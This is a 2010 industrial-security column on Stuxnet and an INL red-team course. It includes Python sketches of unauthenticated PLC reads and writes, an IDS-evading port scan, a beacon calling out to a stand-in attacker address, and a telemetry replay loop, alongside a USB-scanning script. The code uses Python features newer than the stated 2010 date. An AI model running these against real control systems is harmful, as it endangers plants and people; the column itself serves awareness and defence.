
Who’s afraid of the big bad worm?
SECURITY SESSIONS: Volume 2 No. 7

by William T. (Tim) Shaw, PhD, CISSP
Welcome to the final installment of Security Sessions for 2010. Another year has passed, but the perennial challenge facing the engineers and IT folks tasked with providing cyber security for our industrial infrastructure is the still-lingering belief – mainly within upper management – that nothing bad has happened, so all this effort must be just a waste of time and resources. Too many managers still think their automation systems are too isolated or far too complex to be the target of a cyber attack. They may pay lip service to cyber security to keep regulators off their backs, but they don’t truly believe that they are ‘at risk’. This could be a big mistake; read on, and you’ll learn why… – Tim


The industrial automation cyber security forums have been ablaze lately with comments, thoughts and theories about the STUXNET worm that was recently unleashed on the computer automation world. That particular piece of software is a marvel of sophistication, and frightening in its specificity and capabilities. It is also interesting in that it was apparently designed to be delivered via infected thumb drives, rather than propagating between systems using network-based attacks against vulnerable applications, as is the case with most worms. It’s almost as if the designers wanted to keep it from spreading too widely!

The STUXNET worm specifically targets Siemens PLC-based automation systems and infects their Microsoft Windows-based operator or engineering workstations by exploiting a known vulnerability. I say it targets Siemens systems because it specifically looks for Siemens PLCs¹ as part of its design. Once ensconced in such a PC/workstation, it apparently communicates with the system’s PLCs – using the native Siemens communications protocol – and manipulates their program logic, just as you could if you were running the Siemens programming tools in those workstations yourself.
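To make that concrete, here is a minimal sketch – in Python, using the open-source python-snap7 library – of what ‘talking to a PLC in its native protocol’ looks like. The address, rack/slot and data-block numbers are hypothetical, and STUXNET implemented the S7 protocol itself rather than using a library, but the underlying point is the same: any host that can reach the PLC on the network can read and write its memory, no password required.

    # A sketch of native-protocol access to a Siemens S7 PLC, using
    # the open-source python-snap7 library (pip install python-snap7).
    # IP address, rack/slot and data-block numbers are hypothetical.
    import snap7

    client = snap7.client.Client()
    client.connect('192.168.0.10', rack=0, slot=1)   # no authentication

    # Reading process data -- ordinary data acquisition...
    data = client.db_read(1, 0, 4)        # 4 bytes from data block 1
    print('DB1:', data.hex())

    # ...but the same session can write data back, or stop the CPU.
    client.db_write(1, 0, bytearray(4))
    # client.plc_stop()                   # would halt the PLC program

    client.disconnect()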

This worm required a lot of detailed technical knowledge about Siemens systems and PLCs, as well as a general understanding of the PLC logic functions that are important for controlling high-speed rotating equipment. In my view, the really scary thing is that by altering the payload to use other popular PLC communications protocols and programming commands, this malware could be converted to attack a much broader base of industrial automation systems.

Because they were designed to be general-purpose automation building blocks, PLCs support a range of communication functions that include logic/program downloading, data acquisition, and command and control. Thus, it is not necessary for a cyber attacker to actually infect the PLC with malware. In fact, that would be quite difficult to do, since the communication functions don’t provide access to the main processor’s programming. But the attacker can re-task the PLC by sending it program logic changes.
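If you want a feel for how little stands between a network-connected attacker and a typical controller, consider Modbus/TCP, one of the most widely used industrial protocols. The short Python sketch below uses the open-source pymodbus library against a hypothetical controller address; the protocol has no login and no message signing, so any host that can reach TCP port 502 can issue these commands.

    # A sketch of unauthenticated read/write access over Modbus/TCP,
    # using the open-source pymodbus library (pip install pymodbus).
    # Controller address, register and coil numbers are hypothetical.
    from pymodbus.client import ModbusTcpClient

    client = ModbusTcpClient('192.168.1.20')   # port 502 by default
    client.connect()

    # Data acquisition: read a holding register.
    result = client.read_holding_registers(0, count=1)
    print('Register 0:', result.registers[0])

    # Command and control: write a coil. The controller accepts the
    # command from anyone who can reach the port.
    client.write_coil(0, True)

    client.close()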

This behavior has already been demonstrated with Siemens PLCs, but the same approach could probably be used with virtually any PLC on the market today. We can patch the specific vulnerability the worm uses to infect MS-Windows workstations, but there are several other well-documented vulnerabilities that could be used just as easily. Worse yet, a new vulnerability is found practically every day – most often by the bad guys.

So, we have now seen the first – but probably not the last – malware specifically designed to attack industrial automation systems. This is not the run-of-the-mill malware that attacks any type of system running a version of Windows or Linux with the specific vulnerability it is designed to exploit – whether an accounting system, an operator workstation on a distributed control system, or even your own PC. Instead, this malware was highly targeted and crafted for a specific purpose.

Its ability to spread via infected USB thumb drives is especially pernicious, since many industrial control systems are “air gapped” in order to (supposedly) keep them safe from attack. In other words, they are not hard-wired into off-premise networks like the Web. Unfortunately, ‘sneakernet’ – the portable-media ‘back door’ that employees, operators, maintenance staff and others use to carry files around firewalls and other security measures – trumps an air gap any day of the week. I have personally seen too many plants where everyone is walking around with a thumb drive in their pocket, and there is no procedure for certifying or scanning them. I have also been told by well-meaning (but poorly informed) plant engineers that the thumb drives were safe from infection because they were encrypted. This just shows that cyber security was not a priority at that plant and that only a token effort was being made to train and educate plant personnel on cyber security issues.
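A certification procedure for portable media doesn’t have to be elaborate to be worth having. The Python sketch below is a hypothetical example of my own – not any particular plant’s procedure – that walks a mounted removable drive, hashes every file and flags the file types most often used to carry malware. The mount path and the extension list are assumptions; a real procedure would also compare the hashes against a known-good list and run a virus scanner.

    # A minimal sketch of a removable-media check-in script.
    # The mount point and 'risky' extension list are assumptions.
    import hashlib
    import os

    MOUNT_POINT = '/media/usb0'     # hypothetical mount path
    RISKY = {'.exe', '.dll', '.scr', '.lnk', '.vbs', '.bat'}

    for root, dirs, files in os.walk(MOUNT_POINT):
        for name in files:
            path = os.path.join(root, name)
            with open(path, 'rb') as f:
                digest = hashlib.sha256(f.read()).hexdigest()
            ext = os.path.splitext(name)[1].lower()
            flag = '  <-- REVIEW' if ext in RISKY else ''
            print(f'{digest[:16]}  {path}{flag}')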

On a related note, I had the opportunity recently to attend an advanced industrial cyber security training course run by the Idaho National Laboratory (INL). This course is an intensive, highly technical, in-depth look into how hacking occurs and the tools and strategies employed by hackers. From a strictly educational viewpoint, the course is highly informative. It is designed to take the student through a series of lectures and hands-on exercises that demonstrate just how powerful the available tools for attacking computer systems are, and how skilled attackers can use known vulnerabilities and security breaches to sneak into even well-defended networks.

The lab has created a simulated chemical company that has an actual web presence, a simulated corporate network, a simulated plant IT network and an actual industrial automation system complete with controllers, workstations and mixing vessels. The simulation includes typical enterprise firewalls at the connection point to the Internet, intrusion detection systems, and additional firewalls isolating the plant network from the corporate network and the automation system from the plant network. In other words, the setup is a surprisingly high-fidelity simulation of what an attacker would see and face if trying to invade and attack a real chemical plant automation system. They even simulate a range of Windows and Linux platforms with differing levels of patching and operating system versions – everything from Windows NT servers to Ubuntu Linux, just as you might find on a real corporate network.

During the week, a series of exercises allowed the students to try out various hacker pen-testing [penetration testing] software tools and to seek out vulnerabilities and exploit them. A great deal of time was spent playing with the Metasploit framework tools, one of the most powerful penetration testing platforms available today (to both the good and the bad guys!). We also played with Nessus and learned how to be stealthy in order to avoid triggering an intrusion detection system’s alarm threshold.
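To give a feel for the ‘stealthy’ part, the Python sketch below shows the idea stripped of any particular tool: a port probe that randomizes its order and spaces its connection attempts out over minutes, so that it stays below the rate at which a typical intrusion detection system raises an alarm. The target address, port list and delays are all assumptions.

    # A sketch of a low-and-slow TCP port probe. Randomizing the order
    # and spreading probes out over minutes is the classic way to stay
    # under an IDS rate threshold. Target and timing are hypothetical.
    import random
    import socket
    import time

    TARGET = '10.0.0.5'
    PORTS = [21, 22, 23, 80, 102, 443, 502, 3389]
    random.shuffle(PORTS)             # avoid an obvious sequential sweep

    for port in PORTS:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(2.0)
        if s.connect_ex((TARGET, port)) == 0:
            print(f'port {port} open')
        s.close()
        time.sleep(random.uniform(30, 90))   # seconds between probes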

It was quite a shock to realize how easy – and automated – the process of locating, scanning, fingerprinting and attacking computers is with the available tools. Make no mistake, you have to be a reasonably competent programmer to devise your own tools and ‘payloads’, even using the Metasploit framework. But using the hundreds of exploits and payloads already in its database merely requires knowing a few simple commands… and very little else!

The course included discussions of how to break through the Internet-facing corporate firewall and how to establish a covert communications connection through such a firewall. We learned about exotic payloads, which are bits of executable code or full programs that are inserted into the computer under attack. Such payloads can include powerful hacker tools that let you remotely use the infected computer as a platform for attacking deeper into a corporate network. (The term ‘pivot’ is used to describe a compromised computer being remotely used in this manner.)
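The reason such covert connections work is mundane: most corporate firewalls block inbound connections but allow outbound ones. A compromised machine therefore doesn’t need a hole punched in from the outside; it can simply call out to the attacker and ask for instructions. The Python sketch below shows the shape of that ‘call home’ pattern – the server address is hypothetical, and this beacon only reports a hostname, where a real payload would carry a full remote-control loop.

    # A sketch of the outbound 'call home' pattern behind covert
    # channels and pivots. The attacker's address is hypothetical, and
    # port 443 is chosen so the traffic resembles ordinary HTTPS.
    import socket
    import time

    ATTACKER = ('203.0.113.7', 443)

    while True:
        try:
            s = socket.create_connection(ATTACKER, timeout=10)
            s.sendall(socket.gethostname().encode() + b' checking in\n')
            s.close()
        except OSError:
            pass                  # fail quietly and try again later
        time.sleep(300)           # beacon every five minutes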

We witnessed an attack that first compromised an internal PC by sending a spear-phishing email to multiple corporate personnel with a link to an evil website that planted malware on their PCs. One of those PCs – already inside the firewall – was then loaded with hacker tools and used to scan the internal corporate WAN. The attack continued by compromising a data historian that was allowed to communicate through another internal firewall to its mate on a control system LAN. That led to compromise of an operator console.

The eventual result was that the attackers recorded OPC messages sent on the control system LAN from controllers to operator consoles and then ‘replayed’ those messages while attacking the controllers. It was unnerving to see a split-screen display showing tanks overflowing while the operator consoles showed everything running normally. Sure, in the real world hard-wired safety/shutdown logic ought to prevent an outright disaster, but even operating within the limits of such safety logic an attacker could severely degrade or compromise a batch of pharmaceuticals.
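Stripped of the OPC details, the replay trick is simple to describe: record a stretch of normal controller-to-console traffic, then feed the recording back to the console while the real process is driven somewhere else. The toy Python sketch below shows only that record-then-replay logic – the ‘message’ here is a made-up tank-level reading, not real OPC traffic.

    # A toy sketch of a record-and-replay attack on a telemetry stream.
    # Real OPC traffic is far more complex; only the logic is shown.
    import itertools
    import time

    def read_live_value():
        """Stand-in for capturing a controller-to-console message."""
        return 42.0               # hypothetical steady-state tank level

    # Phase 1: record a stretch of normal readings.
    recording = [read_live_value() for _ in range(60)]

    # Phase 2: replay the recording to the console forever, so the
    # operator sees 'normal' no matter what the process actually does.
    for value in itertools.cycle(recording):
        print(f'to console: tank_level={value}')
        time.sleep(1.0)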

On the last day of the course we were divided into two teams: the RED team was to attack the corporate network and try to compromise the plant automation system. The BLUE team was to defend the corporate networks and systems. I was fortunate to be the leader of the RED team. We had some incredibly skilled people on that team, both from the U.S. military and from the IT world. I got to participate in what could only be called cyber war. The defenders fought with every mechanism they had available to them. In the end the RED team managed to out-score the defenders. It was quite a battle.

The point I am making – and the point INL is making with this course – is that the bad guys have very powerful tools and extensive knowledge of networks and system vulnerabilities. The STUXNET worm underlines this fact. And the moral of the story is that treating industrial automation cyber security as a secondary issue is a huge mistake, and one that could be quite costly. Let me be clear: I’m not a doomsayer, and I don’t believe that the bad guys are painting cyber bulls-eyes on all of our industrial facilities. One can safely assume that a plant that makes cat food is less likely to be intentionally targeted than a refinery or a power plant. But that cat food plant could still fall victim to an opportunistic attack by a variant of the STUXNET worm in the future. Would you want to be the owner of that plant, with “worms” in your cat food? No, I didn’t think so.

To effectively defend yourself and your assets from these threats, you’ll need to implement good cyber security policies and procedures, including providing defense-in-depth and comprehensive training of your personnel. As you might expect, there are many ways to protect yourself and maintain a high level of cyber security. But that will have to be the subject matter for a future session... see you in 2011! – Tim

About the Author

William T. “Tim” Shaw (PhD, CISSP) has been active in industrial automation for more than 30 years and is the author of Computer Control of BATCH Processes and CYBERSECURITY for SCADA Systems. Tim has contributed to several other books and is a prolific writer and presenter on a range of technical topics. He is currently a senior security consultant for SecuriCon, an information security solutions firm based in Alexandria, Virginia. Tim has been directly involved in the development of several DCS and SCADA system products and regularly teaches courses for ISA (International Society of Automation) on various topics. Inquiries or comments about this column may be directed to Tim at Tim@electricenergyonline.com.
 

¹ Programmable Logic Controllers